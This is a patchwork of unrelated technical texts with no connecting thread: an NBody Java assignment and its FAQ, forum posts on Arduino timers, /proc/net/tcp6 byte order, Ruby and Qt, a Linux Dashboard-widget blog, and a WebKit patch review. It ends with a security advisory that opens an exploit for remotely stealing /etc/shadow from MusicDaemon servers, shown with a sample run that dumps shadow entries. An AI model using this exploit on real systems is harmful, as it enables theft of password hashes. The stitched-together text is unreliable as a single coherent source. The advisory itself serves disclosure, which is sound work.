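The takeaway is only the reading pattern: values come off the front of the file in order, so the header must be consumed before the planet rows.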
We encourage you (and your partner, if applicable) to do your best to figure out this part of the assignment on your own. In the long run, you'll need to gain the skills to independently figure out this sort of thing. However, if you start getting frustrated, don't hesitate to ask for help!
You can test this method using the supplied TestReadRadius.
ReadPlanets
Your next method is readPlanets. Given a file name, it should return an array of Planets corresponding to the planets in the file, e.g. readPlanets("./data/planets.txt") should return an array of five planets. You will find the readInt(), readDouble(), and readString() methods in the In class to be useful.
You can test this method using the supplied TestReadPlanets.
Drawing the Initial Universe State (main)
Next, build the functionality to draw the universe in its starting position. You'll do this in four steps. Because all code for this part of the assignment is in main, this part of the assignment will NOT have automated tests to check each little piece.
Collecting All Needed Input
Create a main method in the NBody class. Write code so that your NBody class performs the following steps:
- Store the 0th and 1st command line arguments as doubles named T and dt.
- Store the 2nd command line argument as a String named filename.
- Read in the planets and the universe radius from the file described by filename, using your methods from earlier in this assignment.
Drawing the Background
After your main method has read everything from the files, it's time to get drawing. First, set the scale so that it matches the radius of the universe. Then draw the image starfield.jpg as the background. To do these, you'll need to figure out how to use the StdDraw library.
See StdDrawDemo.java in the examples folder for a demonstration of StdDraw. This example, like InDemo, does not perfectly match what you're doing.
In addition, make sure to check out the StdDraw section of this mini-tutorial, and if you're feeling bold, the full StdDraw documentation. This will probably take some trial and error. This may seem slightly frustrating, but it's good practice!
Drawing One Planet
Next, we'll want a planet to be able to draw itself at its appropriate position. To do this, take a brief detour back to the Planet.java file. Add one last method to the Planet class, draw, that uses the StdDraw API mentioned above to draw the Planet's img at the Planet's position. The draw method should return nothing and take in no parameters.
Drawing All of the Planets
Return to the main method in NBody.java and use the draw method you just wrote to draw each one of the planets in the planets array you created. Be sure to do this after drawing the starfield.jpg file, so that the planets don't get covered up by the background.
Test that your main method works by compiling:
javac NBody.java
And running the following command:
java NBody 157788000.0 25000.0 data/planets.txt
You should see the sun and four planets sitting motionless. You are almost done.
Creating an Animation
Everything you've done so far is leading up to this moment. With only a bit more code, we'll get something very cool.
To create our simulation, we will discretize time (please do not mention this to Stephen Hawking). The idea is that at every discrete interval, we will be doing our calculations and once we have done our calculations for that time step, we will then update the values of our Planets and then redraw the universe.
Finish your main method by adding the following:
- Create a time variable and set it to 0. Set up a loop that runs until this time variable reaches T.
For each time through the loop, do the following:
- Create an xForces array and a yForces array.
- Calculate the net x and y forces for each planet, storing these in the xForces and yForces arrays respectively.
- Call update on each of the planets. This will update each planet's position, velocity, and acceleration.
- Draw the background image.
- Draw all of the planets.
- Pause the animation for 10 milliseconds (see the show method of StdDraw). You may need to tweak this on your computer.
- Increase your time variable by dt.
Important: For each time through the main loop, do not make any calls to update until all forces have been calculated and safely stored in xForces and yForces. For example, don't call planets[0].update() until the entire xForces and yForces arrays are done! The difference is subtle, but the autograder will be upset if you call planets[0].update before you calculate xForces[1] and yForces[1].
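To see why the ordering matters, here is a self-contained toy version of the loop. Everything here is a stand-in (1-D positions, a made-up pull-toward-the-origin force, placeholder names), not the project's real classes: if you updated bodies[0] before computing forces[1], bodies[1] would feel a force from bodies[0]'s new position instead of its old one.

```java
// Toy 1-D illustration of the forces-then-update ordering.
public class LoopSketch {
    static class Body {
        double pos, vel;
        Body(double pos) { this.pos = pos; }
        // made-up force law: each body is pulled toward the origin
        double netForce() { return -pos; }
        void update(double dt, double f) {
            vel += dt * f;       // mass is 1, so acceleration == force
            pos += dt * vel;
        }
    }

    public static void main(String[] args) {
        Body[] bodies = { new Body(1.0), new Body(-2.0) };
        double dt = 0.5;
        for (double time = 0; time < 1.0; time += dt) {
            // 1) compute ALL forces first, from the OLD positions...
            double[] forces = new double[bodies.length];
            for (int i = 0; i < bodies.length; i++) {
                forces[i] = bodies[i].netForce();
            }
            // 2) ...and only then call update on anyone
            for (int i = 0; i < bodies.length; i++) {
                bodies[i].update(dt, forces[i]);
            }
        }
        System.out.println(bodies[0].pos + " " + bodies[1].pos);
    }
}
```

With this ordering, every force in a given time step is computed from the same snapshot of positions; for this toy setup it prints 0.3125 -0.625.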
Compile and test your program:
javac NBody.java
java NBody 157788000.0 25000.0 data/planets.txt
Make sure to also try out some of the other simulations, which can all be found in the data directory. Some of them are very cool.
Adding Audio
(Optional) For a finishing touch, play the theme to 2001: A Space Odyssey using StdAudio and the file 2001.mid. Feel free to add your own audio files and create your own soundtracks!
Printing the Universe
When the simulation is over, i.e. when you've reached time T, you should print out the final state of the universe in the same format as the input, e.g.:
You are welcome to try to figure this out on your own, but if you'd prefer not to, you can find a solution in the hw hints.
This isn't all that exciting (which is why we've provided a solution), but we'll need this method to work correctly to autograde your assignment.
Submission
Submit NBody.java and Planet.java to Gradescope. If you pass all the tests, you get all the points. Hoorah! You may submit as many times as you'd like. We'll start restricting the autograder on future projects. The grader will be running by 1/24. Update: Sorry, due to some technical issues it'll actually be late 1/25.
Feel free to share your own custom universes on Piazza. Make sure to try out the other examples in the data folder!
Extra for Experts
There are a number of interesting possibilities:
- Create your own universe files.
- Support elastic (or inelastic) collisions.
- Add the ability to programmatically generate planet images (rather than relying on input image files).
- Add the ability to control a spacecraft that is subject to the gravitational forces of the objects in the solar system. Try flying from one planet to another.
If you decide to implement anything extra, you should make another copy of your project in a subdirectory of your project called 'extra'. Don't add new methods to the files that you submit, otherwise the autograder will get perturbed. After the deadline, feel free to share your creations on Piazza or elsewhere.
Acknowledgements: This assignment is a major revision by Josh Hug, Matthew Chow, and Daniel Nguyen of an assignment created by Robert Sedgewick and Kevin Wayne from Princeton University.
Frequently Asked Questions
I'm passing all the local tests, but failing even easy tests like testReadRadius in the autograder.
Make sure you're actually using the string argument that testReadRadius takes as input. Your code should work for ANY valid data file, not just planets.txt.
The test demands 133.5, and I'm giving 133.49, but it still fails!
Sorry, our sanity check tests have flaws. But you should ensure that your value for G is exactly 6.67 × 10⁻¹¹ N·m²/kg², and not anything else (don't make it more accurate).
When I run the simulation, my planets start rotating, but then quickly accelerate and disappear off of the bottom left of the screen.
- Look at the way you're calculating the force exerted on a particular planet in one time step. Make sure that the force doesn't include forces that were exerted in past time steps.
- Make sure you did not use Math.abs(...) when calculating calcForceExertedByX(...) and calcForceExertedByY(...). Also ensure that you are using a double to keep track of summed forces (not an int)!
Why'd you name the class Planet? The sun isn't a Planet.
You got us. We could have used Body, but we didn't. Maybe next time?
What is a constructor? How do I write one?
A constructor is a block of code that runs when a class is instantiated with the new keyword. Constructors serve the purpose of initializing a new object's fields. Consider the example below:
public class Dog {
    String _name;
    String _breed;
    int _age;

    public Dog(String name, String breed, int age) {
        _name = name;
        _breed = breed;
        _age = age;
    }
}
The Dog class has three non-static fields. Each instance of the Dog class can have a name, a breed, and an age. Our simple constructor, which takes three arguments, initializes these fields for all new Dog objects.
I'm having trouble with the second Planet constructor, the one that takes in another Planet as its only argument.
Let's walk through an example of how a constructor works. Suppose you use the Dog constructor above to create a new Dog:
Dog fido = new Dog("Fido", "Poodle", 1);
When this line of code gets executed, the JVM first creates a new Dog object that's empty. In essence, the JVM is creating a "box" for the Dog, and that box is big enough to hold a box for each of the Dog's declared instance variables. This all happens before the constructor is executed. At this point, here's how you can think about what our new fluffy friend fido looks like (note that this is a simplification! We'll learn about a more correct view of this when we learn about Objects and pointers later this semester):
Java will put some default values in each instance variable. We'll learn more about where these defaults come from (and what null means) later this semester. For now, just remember that there's space for all of the instance variables, but those instance variables haven't been assigned meaningful values yet. If you ever want to see this in action, you can add some print statements to your constructor:
public Dog(String name, String breed, int age) {
    System.out.println("_name: " + _name + ", _breed: " + _breed + ", _age: " + _age);
    _name = name;
    _breed = breed;
    _age = age;
}
If this constructor had been used to create fido above, it would have printed:
_name: null, _breed: null, _age: 0
OK, back to making fido. Now that the JVM has made some "boxes" for fido, it calls the Dog constructor function that we wrote. At this point, the constructor executes just like any other function would. In the first line of the constructor, _name is assigned the value name, so that fido looks like:
When the constructor completes, fido looks like:
Now, suppose you want to create a new Dog constructor that handles cross-breeding. You want the new constructor to accept a name, an age, and two breeds, and create a new Dog that is a mixture of the two breeds. Your first guess for how to make this constructor might look something like this:
public Dog(String name, String breed1, String breed2, int age) {
    Dog dog = new Dog(name, breed1 + breed2, age);
}
However, if you try to create a new Dog using this constructor:
Dog tommy = new Dog("Tommy", "Poodle", "Golden Retriever", 1);
This won't do what you want! As above, the first thing that happens is that the JVM creates empty "boxes" for each of tommy's instance variables:
But then when the 4-argument constructor got called, it created a second Dog and assigned it to the variable dog. It didn't change any of tommy's instance variables. Here's how the world looks after the line in our new constructor finishes:
dog isn't visible outside of the constructor method, so when the constructor completes, dog will be destroyed by the garbage collector (more on this later!) and all we'll have is the still un-initialized tommy variable.
Here's a cross-breed constructor that works in the way we'd like:
public Dog(String name, String breed1, String breed2, int age) {
    this(name, breed1 + breed2, age);
}
Here, we're calling the old 3-argument constructor on this; rather than creating a new Dog, we're using the 3-argument constructor to fill in all of the instance variables on this dog. After calling this new constructor to create tommy, tommy will correctly be initialized to:
We could have also written a new constructor that assigned each instance variable directly, rather than calling the existing constructor:
public Dog(String name, String breed1, String breed2, int age) {
    _name = name;
    _breed = breed1 + breed2;
    _age = age;
}
I fixed up your indenting and got rid of the useless "else". You are checking for buttonState to change, but ignoring the change if the time isn't up. Which is what you are reporting is happening.
Rework it. Make a flowchart (just a simple one) of what you expect to happen when. You have a couple of things: button press, time elapsed. If you don't want one dependent on the other, don't put the test for time under the test for the button press.
#include <Timer.h>
#include <Relay.h>
#include <Button.h>
#include <Bounce.h>

Button button1(5);
Button button2(6);
Button button3(7);
Relay contactor1(2, true);
Relay contactor2(3, true);
Relay contactor3(4, true);

#define BUTTON 13

int lastButtonState = 0;
int buttonState = 0;
boolean pthree = 0;

Timer timer1;
Timer timer2;
Bounce bouncer = Bounce(BUTTON, 5);

void setup() {
  button1.begin();
  button2.begin();
  button3.begin();
  contactor1.begin();
  contactor2.begin();
  contactor3.begin();
  pinMode(BUTTON, INPUT);
}

void loop() {
  if (bouncer.update()) {
    if (bouncer.read() == HIGH) {
      if (button1.read() == HIGH && button2.read() == HIGH && button3.read() == HIGH) {
        contactor1.on();
        pthree = 1;
        timer1.resetTimer();
        timer2.resetTimer();
      }
    }
  }
  if (pthree == 1) {
    if (timer1.timeDelay(3000)) {
      contactor2.on();
    }
    if (timer2.timeDelay(6000)) {
      contactor3.on();
    }
  }
}
I was writing a utility to check /proc/net/tcp and tcp6 for active connections, as it's faster than parsing netstat output.
As I don't actually have IPv6 enabled, I was mainly utilizing localhost as my reference point. Here is a copy of my /proc/net/tcp6:
sl local_address remote_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
0: 00000000000000000000000000000000:006F 00000000000000000000000000000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 19587 1 ffff880262630000 100 0 0 10 -1
1: 00000000000000000000000000000000:0050 00000000000000000000000000000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 22011 1 ffff880261c887c0 100 0 0 10 -1
2: 00000000000000000000000000000000:0016 00000000000000000000000000000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 21958 1 ffff880261c88000 100 0 0 10 -1
3: 00000000000000000000000001000000:0277 00000000000000000000000000000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 28592 1 ffff88024eea0000 100 0 0 10 -1
Here is the matching netstat -6 -pant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
Entries 0-2 from tcp6 correspond with the ::'s (all IPv6), but entry 3 is supposedly the corresponding entry for ::1.
This is where I'm confused...
00000000000000000000000001000000 => 0000:0000:0000:0000:0000:0000:0100:0000 => ::100:0
When I run ::1 through some code to generate the full hex representation I get:
import binascii
import socket
print binascii.hexlify(socket.inet_pton(socket.AF_INET6, '::1'))
00000000000000000000000000000001
I can't programmatically line these two values up, because they don't match (obviously). Why don't they match? Why does the kernel think ::100:0 is ::1?
This is due to counterintuitive byte order in /proc/net/tcp6. The address is handled as four words consisting of four bytes each. In each of those four words the four bytes are written backwards.
This is probably due to endianness differences. Most PCs these days use IA32 or AMD64, which use the opposite endianness from what IP was designed with. I don't have any other systems to test with to figure out if you can rely on /proc/net/tcp6 always looking like that. But I verified that it is the case on both IA32 and AMD64 architectures.
2001:db8::0123:4567:89ab:cdef would thus come out as B80D0120 00000000 67452301 EFCDAB89 (with spaces inserted for clarity).
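A short sketch of undoing that per-word byte swap in Python. This assumes the little-endian x86 layout described above (so it would need adjusting on a big-endian machine), and parse_proc_tcp6_addr is a hypothetical helper name:

```python
import socket
import struct

def parse_proc_tcp6_addr(hex_addr):
    """Convert a /proc/net/tcp6 address (32 hex chars) to standard notation.

    On little-endian hosts the kernel writes the address as four 32-bit
    words in host byte order, so each 4-byte group is byte-swapped back
    to network (big-endian) order before formatting.
    """
    raw = bytes.fromhex(hex_addr)
    words = struct.unpack('<4I', raw)          # four little-endian words
    packed = struct.pack('>4I', *words)        # repack big-endian
    return socket.inet_ntop(socket.AF_INET6, packed)

print(parse_proc_tcp6_addr('00000000000000000000000001000000'))  # -> ::1
```

Running it on the example above, 'B80D0120000000006745230...' style input comes back out as the expected compressed address.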
Found this perl module intended for parsing /proc/net/tcp
It quotes the kernel documentation as shown below.
Hello.
Lately I had an idea.
Methods take default arguments like so:
def foo(i = 'blee', j = 'blabalaa')
I had a need to call foo() in my code, but change the default for the j argument. There may be several ways, like redefining:
def foo(i = 'blee', j = 'foofoo')
One could also use a hash instead.
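As a sketch of that hash-style idea, using keyword arguments and the names from this post (one possible workaround, not the only one):

```ruby
# Keyword-argument version of foo: i and j keep their defaults unless
# explicitly overridden at the call site.
def foo(i: 'blee', j: 'blabalaa')
  [i, j]
end

p foo                    # both defaults
p foo(j: 'dumdedum')     # override only j; i stays 'blee'
```

Here foo(j: 'dumdedum') leaves i at its default, which is the effect described above.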
But I myself, thought about this:
foo.j = 'dumdedum'
Of course this does not work. But my question is, would this
work in Ruby in theory? And if not, why can it not work?
I am thinking that methods could be treated as pseudo objects.
We also can already create objects from methods via method(:name)
(I think it is of UnboundMethod class)
I am wondering, if arguments to methods are data, why couldn’t
they be (pseudo)objects at the same time as well?
Shift the coordinates under Android when I use QML + c++.
- Francky033 last edited by Francky033
Hi,
I'm making a Qt 5.10 application for Windows, Linux, MacOS etc...
I use in particular dialog boxes written in QML that I display using c++.
for example this box:
The C++ part:
component_aideQML = new QQmlComponent(engine_configuration);
component_aideQML->loadUrl(QUrl("qrc:///qml/help.qml"));
helpQML = qobject_cast<QQuickWindow*>(component_aideQML->create());
helpQML->setWidth(450);
helpQML->setHeight(300);
helpQML->setPosition(0.0, 0.0);
helpQML->setFlags(Qt::WindowStaysOnTopHint | Qt::FramelessWindowHint);
helpQML->showNormal();
the QML part :
import QtQuick 2.9
import QtQuick.Window 2.3
import QtQuick.Controls 2.2
import QtQuick.Controls.Material 2.2
import MyLib 1.0

Window {
    id: main2
    property double trans: anchoraide.Trans
    property double coef: anchoraide.Coef
    property string texte: anchoraide.texte
    Material.theme: Material.Dark
    Material.accent: Material.Red
    modality: Qt.NonModal
    //visibility: Window.Windowed
    width: 450
    height: 300
    color: "#333333"
    opacity: trans

    Image {
        id: image_fermer
        width: 34
        height: 34
        anchors.top: parent.top
        anchors.topMargin: 0
        anchors.right: parent.right
        anchors.rightMargin: 0
        source: "../res/icons/fermer.png"

        MouseArea {
            anchors.fill: image_fermer
            onClicked: {
                anchoraide.checkPost_command("exit")
            }
        }
    }

    Component.onCompleted: {
        visible = true
    }
}
Everything works fine if I use setPosition(0.0, 0.0);
when I press the red button, the checkPost_command ("exit") function in the MouseArea sends the "exit" text to the c++ part that allow to close the window...
On the other hand, everything changes if I use setPosition(0.0, 200.0), for example.
Clicking on the red button no longer sends the signal, but strangely enough, clicking 200 pixels below the red picture will close the window!
It is as if the MouseArea had been translated by 200 + 200 pixels on the y-axis (see location of the black circle).
Everything works normally on Windows, Linux and MacOS. The problem only appears with Android...
How do we fix that?
With my thanks,
Francky033
- ambershark Moderators last edited by
@Francky033 If it's working with linux, osx, windows, but not android my guess is it's a bug in Qt/QML for android.
I would search the bug reports, and if nothing is there, post a bug with the information you provided above.
From just eyeballing it the QML and C++ all seem correct/valid. Maybe someone with more QML experience can comment. :)
- Francky033 last edited by
thanks @ambershark !
I've just posted a bug report
Seems we're continuing the discussion in both threads now. More inline ...
On Wed, Feb 29, 2012 at 3:39 PM, Ian Dickinson <ian@epimorphics.com> wrote:
> point I'm trying to make is when you do it at all you have to quantify
why. That gets tedious and error prone and with the rate of growth we're
dealing with that's just unmanageable IMO.
> The class/package names are merely not being deleted. Presuming that the
> original code was part of the inceptional code grant, one can conclude that
> the company in question doesn't mind their namespace being used by ASF
> projects *for that purpose*.
>
>
OK, I'm completely content if the Co. in question does so in writing, freeing us of any responsibility.
--
Best Regards,
-- Alex
It’d be cool if Linux had Apple’s Dashboard. For those of you who don’t know about it, Dashboard allows Mac OS X users to build little applications using nothing more than HTML, CSS, and JavaScript. That’s very neat.
(Sidebar: For those of you saying “what about gdesklets!”, let me just say: no. The whole reason that Dashboard is good is that it lets ordinary people who know about the web build widgets. Having to use some odd XML dialect means that it’s like real programming. That’s why there are more Dashboard widgets than gdesklets, even though gdesklets has been around for ages. End sidebar.)
I started to have a look at how difficult it would be to implement this on Linux, using Mozilla’s Gecko as the underlying web library. (I could have done it with KHTML, I suppose, and that would have been more likely to match with Apple’s WebKit since WebKit is a fork. I didn’t, though, because I understand Mozilla and Gtk much, much better than I understand either KHTML or Qt/KDE. I’d love to see a KHTML version.) The theory was that it should use existing Dashboard widgets, giving new users a huge library of stuff that already ran to choose from. In essence, the idea isn’t too difficult to do. It requires:
- Making something that understands the Dashboard widget definition format, so it can parse existing widgets
- Building a Gtk app that embeds Gecko and displays the widgets
- Injecting some extra JavaScript into each widget that takes care of differences between Gecko and WebKit
The first two weren’t that difficult. The third…more complex than you might think. Safari and Firefox (WebKit and Gecko) differ in a lot of ways, and (understandably, and not at all reprehensibly) Dashboard widgets don’t take account of those ways because they are only built to run on WebKit. I got a reasonable proportion of the ways done, but there’s still enough that there aren’t many widgets that it actually runs correctly.
I now, sadly, don’t have time to continue to work on the project, but I’d love to see someone else take up the slack. It’s called Jackfield, for reasons that I can barely remember (I think I looked “dashboard” up in a thesaurus somewhere).
A screenshot of the existing program, with the Jackfield toolbar and some widgets running:
You can grab the Jackfield code (2.7MB tar.gz) if you’re interested in looking into it or working further on it. To run, cd into the jackfield directory and run
python Control.py for the command syntax. You’ll need some widgets, too. Have a play around if you’re interested.
Update (2006-07-07): don’t download the tarball. Instead, read the more up-to-date install instructions.
Oh, and one quick note: my personal wiki has the notes I made while building the project to the state it's in, if that's helpful.
Posted by sil on January 22nd, 2006.
Nice! I think one of KDE plasma’s goals is Dashboard widget compatibility, so the KHTML port may already be taken care of.
Posted by tommo on January 22nd, 2006.
If a support request here is inappropriate, please ignore it.
When I run ‘python Control.py start showing’, an empty gray control bar shows up on my screen.
I take it the widgets in the ‘widget’ folder of the download are actually supposed to function.
So; how do I get on from here?
Posted by Emil on January 29th, 2006.
Emil: the code is hardcoded to look for the widgets directory in a particular place. Edit Control.py and change WIDGET_DIRS to contain the widget directory, or put the widget directory as ~/Library/Widgets or ~/Projects/jackfield/Widgets and it should work a little better.
This is purely because it’s unfinished…
Posted by sil on January 29th, 2006.
After extracting the .tar.gz file, what do I do to install the application? I tried the command : python Control.py
but I received an error of some sort.
(Sorry, I’m new Linux..)
Posted by horace on February 1st, 2006.
horace: be warned, the code is not in a usable state. The “error of some sort” you receive should tell you to run “python Control.py start showing”, which should show the widget bar (although see Emil’s question and answer above if there are no widgets in it). I repeat, though, that this code is not destined for users, it’s destined for hackers who want a leg up in building a Dashboard-a-like for Linux.
Posted by sil on February 1st, 2006.
Nice! I have downloaded the code and will try it today. Any chance of calling the widgets .. “jacklets”?? :)
Posted by Andy on February 8th, 2006.
Just a note that, though your code checks for minor >= 40 and minor
Posted by Brad on February 10th, 2006.
Hmm… your comments thing seems to have truncated my message. :\
Well, let’s try again (the short version this time): Your code uses features that don’t seem to have been implimented prior to dbus version 0.42. Thus, it doesn’t work on Fedora Core 4, which ships with 0.40. You can save yourself some support posts by changing your version check accordingly.
Looks really cool, though. I’ll either update dbus or just wait for FC5 but one way or another I will definitely play with it soon.
Posted by Brad on February 10th, 2006.
Brad: I believe you. The issue is that the dbus chaps break the API every time they release a new version, because it’s unstable. It was very difficult to get an answer when I asked questions like “which version of dbus should I support” and “how do I do thing X in version Y of dbus”, because the answer was almost always “run the most recent version”. So I guessed a bit, and made it work with the dbus that I had installed on my version of Ubuntu.
Posted by sil on February 10th, 2006.
wow! that certainly looks awesome man.
Posted by sycamore on April 11th, 2006.
[...] I’ve signed up to do a lightning talk at Guadec on Jackfield. That’s scaring me a bit, that. [...]
Posted by as days pass by » Lightning talk at Guadec on Jackfield on June 9th, 2006.
You should see if the gnome project would be interrested in taking care of it (looks like something they might like)
Posted by Anonymous on June 19th, 2006.
It looks brilliant. However it won't run with Dapper's dbus (I tried changing it to allow dbus 0.50, but it caused an error).
BTW is there a SVN repo or similar? (I’m guessing a lot of work has gone into this for Guadec)
Posted by Paul Nolan on June 29th, 2006.
[...] You can find an Apple-like Dashboard for Linux here. [...]
Posted by XGLusers - news and future » Dashboard für Linux on July 7th, 2006.
Wow. Amazing stuff. This is what I have been searching for a long time! (compiz.net thread about it).
But I have the same problem with dapper:
Traceback (most recent call last):
File "Control.py", line 7, in ?
import jackfield_dbus
File "/jackfield/jackfield/jackfield_dbus.py", line 56, in ?
raise NotImplementedError("DBus 0.50 untested!")
NotImplementedError: DBus 0.50 untested!
Posted by Speedator on July 7th, 2006.
If you’re having dapper dbus errors, please use the svn version, which should have fixed this…
Posted by sil on July 7th, 2006.
same problem here on Etch, even with the SVN version.
Traceback (most recent call last):
File "jackfield/Control.py", line 7, in ?
import jackfield_dbus
File "/home/jabba/apps/jackfield/jackfield/jackfield_dbus.py", line 56, in ?
raise NotImplementedError("D-Bus " + dbus.version + " untested!")
TypeError: cannot concatenate 'str' and 'tuple' objects
Package "python2.4-dbus" installed.
Posted by jabba on February 14th, 2007.
WOW. Thank you so much. Please continue to improve and work on this. This project is very much valued!
Posted by 3Saul on March 26th, 2007.
[...] It looks like someone really has programmed something similar to Apple's Dashboard for the Gnome desktop. It's called Jackfield and is definitely something I'll try out when I have the time. [...]
Posted by linux meets öpfel » Blog Archiv » Dashboard Widgets on June 5th, 2007.
[...] For Linux, you must have installed Jackfield [...]
Posted by La Capi » Blog Archive » Widget Download on May 10th, 2008.
[...] we can find countless of them on Gnome-Look, or there is also the Dashboard option on the Jackfield site. You can download Screenlets for whichever version of Ubuntu you have at: [...]
Posted by Que es un Widget?. « Linux & Newbie on June 6th, 2008.
Implement GraphicsContext::fillRoundRect() to draw box shadow.
Created attachment 33793 [details]
patch to implement fillRoundRect
patch to implement fillRoundRect().
Comment on attachment 33793 [details]
patch to implement fillRoundRect
No need to include "Written by" in this patch and please use the proper/consistent email address
You should use 0 instead of NULL.
You have braces around IntersectClipRect twice where the coding guidelines say there should not be (not that I agree...)
The rest seems fine.
Created attachment 33798 [details]
Updated patch to implement fillRoundRect
Comment on attachment 33798 [details]
Updated patch to implement fillRoundRect
> + Written by Crystal Zhang <crystal.zhang@torchmobile.com>
That should be removed on checkin.
Comment on attachment 33798 [details]
Updated patch to implement fillRoundRect
Round() was renamed as pointed out by Yong. Need to revisit this patch.
Created attachment 33809 [details]
Updated patch again
Update patch according to review.
Comment on attachment 33809 [details]
Updated patch again
No no no. This is a bunch of copy/paste code. Please use functions (static inline perhaps?) instead. George should be able to help you.
Created attachment 34314 [details]
Refactor fillRoundRect()
Comment on attachment 34314 [details]
Refactor fillRoundRect()
What is "trRect" supposed to mean?
1244 IntRect trRect = fillRect;
See the webkit style guidelines about naming variables.
We really need an IntRect::centerPoint() function for this sort of thing:
// Draw top left half
1270 RECT clipRect(rectWin);
1271 clipRect.right = rectWin.left + (rectWin.right - rectWin.left) / 2;
1272 clipRect.bottom = rectWin.top + (rectWin.bottom - rectWin.top) / 2;
1275 bool newClip;
1276 if (GetClipRgn(dc, clipRgn.get()) <= 0)
1277 newClip = true;
1278 else
1279 newClip = false;
simpler as:
bool needsNewClip = (GetClipRgn(dc, clipRegion.get()) <= 0);
Needs better variable names too.
Again, we need a "center point" function. compute it once, and then use it to make the various different rects you need.
1283 // Draw top right
1284 clipRect = rectWin;
1285 clipRect.left = rectWin.left + (rectWin.right - rectWin.left) / 2;
1286 clipRect.bottom = rectWin.top + (rectWin.bottom - rectWin.top) / 2;
IntPoint centerPoint(const IntRect&) can just be a static inline for now.
Please run check-webkit-style:
1317 } else {
1318 IntersectClipRect(dc, clipRect.left, clipRect.top, clipRect.right, clipRect.bottom);
1319 }
What does "newClip" mean? Please give it a more descriptive name.
1322 if (newClip)
1323 SelectClipRgn(dc, NULL);
1324 else
1325 SelectClipRgn(dc, clipRgn.get());
can be written as:
SelectClipRgn(dc, needsNewClip ? 0 : clipRgn.get())
We don't use NULL in C++ code.
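Taken together, the review comments amount to something like the following sketch. This is illustrative only: it uses minimal stand-ins for WebCore's IntRect and IntPoint rather than the real classes, and the helper names are made up.

```cpp
#include <cassert>

// Minimal stand-ins for WebCore's IntPoint/IntRect, for illustration only.
struct IntPoint {
    int x, y;
};

struct IntRect {
    int left, top, right, bottom;
};

// The suggested helper: compute the center once and reuse it.
static inline IntPoint centerPoint(const IntRect& r) {
    return { r.left + (r.right - r.left) / 2, r.top + (r.bottom - r.top) / 2 };
}

// Each quadrant is then built from the shared center point instead of
// repeating the midpoint arithmetic four times.
static inline IntRect topLeftQuadrant(const IntRect& r) {
    const IntPoint c = centerPoint(r);
    return { r.left, r.top, c.x, c.y };
}
```

With that in place, the clip-region test collapses the same way the reviewer showed: bool needsNewClip = (GetClipRgn(dc, clipRgn.get()) <= 0); and later SelectClipRgn(dc, needsNewClip ? 0 : clipRgn.get());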
I think George should review all WinCE patches before they're posted here. We're just wasting reviewer time catching basic errors like these.
Created attachment 34476 [details]
Made some improvements to the code
Comment on attachment 34476 [details]
Made some improvements to the code
Did you miss a change to the .h file? It seems like a new method is added.
Created attachment 34484 [details]
Add update to .h file
Comment on attachment 34484 [details]
Add update to .h file
> --- a/WebCore/platform/graphics/GraphicsContext.h
> +++ b/WebCore/platform/graphics/GraphicsContext.h
> @@ -221,6 +221,8 @@ namespace WebCore {
> void fillRect(const FloatRect&, Generator&);
> void fillRoundedRect(const IntRect&, const IntSize& topLeft, const IntSize& topRight, const IntSize& bottomLeft, const IntSize& bottomRight, const Color&);
>
> + void drawRoundCorner(bool newClip, RECT clipRect, RECT rectWin, HDC dc, int width, int height);
> +
> void clearRect(const FloatRect&);
>
> void strokeRect(const FloatRect&);
That should be in a PLATFORM(WINCE) place or it will break the build for others.
Created attachment 34492 [details]
Move drawRoundCorner's declaration to PLATFORM(WINCE) place
Comment on attachment 34492 [details]
Move drawRoundCorner's declaration to PLATFORM(WINCE) place
> + if(!dc)
> + return;
A space should be added after "if" when checking in.
Created attachment 34497 [details]
Coding style change, use format-patch to generate patch
Created attachment 34501 [details]
Fix the errors when applying the patch.
Fix the errors when applying the patch.
Created attachment 34516 [details]
Fix the errors when applying the patch.
Comment on attachment 34516 [details]
Fix the errors when applying the patch.
When committing, if it's not applying cleanly please just manually merge if possible. This could be a never-ending game, with the files changing underneath the patch between r+ and commit.
The commit queue isn't capable of any manual merging. If the commit fails, it will just be marked as commit-queue- and a committer (like yourself) will have to land it manually. "bugzilla-tool apply-patches" can help with this. If you're worried about it getting stale or needing manual intervention, it's probably best to just do it yourself.
Has been fixed and committed.
https://bugs.webkit.org/show_bug.cgi?id=27842
[UNIX] Music Daemon DoS and File Disclosure Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 08/26/04
To: list@securiteam.com Date: 26 Aug 2004 14:08:29 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
Music Daemon DoS and File Disclosure Vulnerabilities
------------------------------------------------------------------------
SUMMARY
Music daemon (musicd) is a
"music player designed to run as a independent server where different
front-end can connect to control the play or get information about what is
playing etc".
Two remotely exploitable vulnerabilities have been found in the product,
one allows attackers to cause the program to no longer respond to
legitimate users, the other allows reading of sensitive files, such as the
/etc/shadow file.
DETAILS
Vulnerable Systems:
* MusicDaemon version 0.0.3 and prior
Exploit:
/* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS
* Vulnerability discovered by: Tal0n 05-22-04
* Exploit code by: Tal0n 05-22-04
*
* Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, wsxz,
* serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires,
* bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g
*
* MusicDaemon MUST be running as root, which it does by default anyways.
* Tested on Slackware 9 and Redhat 9, but should work generically since the
* nature of this vulnerability doesn't require shellcode or return addresses.
*
*
* Client Side View:
*
* root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow
*
* MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer
*
* Connected to 127.0.0.1:1234...
* Sending exploit data...
*
* <*** /etc/shadow file from 127.0.0.1 ***>
*
* Hello
* <snipped for privacy>
* ......
* bin:*:9797:0:::::
* ftp:*:9797:0:::::
* sshd:*:9797:0:::::
* ......
* </snipped for privacy>
*
* <*** End /etc/shadow file ***>
*
